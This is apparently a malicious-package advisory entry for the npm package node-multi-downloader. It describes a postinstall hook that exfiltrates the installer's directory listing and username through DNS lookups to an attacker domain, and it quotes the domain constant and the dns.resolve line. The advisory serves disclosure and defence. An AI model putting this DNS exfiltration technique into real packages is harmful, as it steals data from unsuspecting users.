MAL-2026-5735
Dashboard / Malicious Package / MAL-2026-5735
MAL-2026-5735
Summary: Malicious code in node-multi-downloader (npm)
Details: Source: amazon-inspector (8fc720cd970f4d19212ca90945b7fc1e4e1c64da98235ff595b3792ae69e3e68) On `npm install`, this package's postinstall hook (`node index.js`) hex-encodes the installer's current working directory, the first 15 entries of that directory, and `os.userInfo().username`, and leaks each chunk via DNS A-record lookups to subdomains of the attacker-controlled domain `uqlyosvp1f9.oob.evilsec.xyz`. The hardcoded out-of-band domain is bound at index.js line 1 (`const D = "uqlyosvp1f9.oob.evilsec.xyz"`) and index.js line 8 calls `dns.resolve(`${chunk}.${tag}${i}.${D}`, 'A',...)` to transmit the encoded data. DNS-subdomain encoding is a well-known technique to evade HTTP egress filtering. The package metadata (description "RSI package!", anonymous author, release-candidate version) provides no legitimate purpose that would justify reading installer filesystem and identity at install time. Source: ghsa-malware (c4dcda165ec9c4aeaf9717069c8a7fbbd56eb311976815127695894752de7115) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
References: https://www.npmjs.com/package/node-multi-downloader/v/5.0.14-rc.3, https://github.com/advisories/GHSA-hmxh-99g9-4v4j
Affected packages
Package
Name: node-multi-downloader
Purl: pkg:npm/node-multi-downloader
Affected ranges
Type: SEMVER
Events:
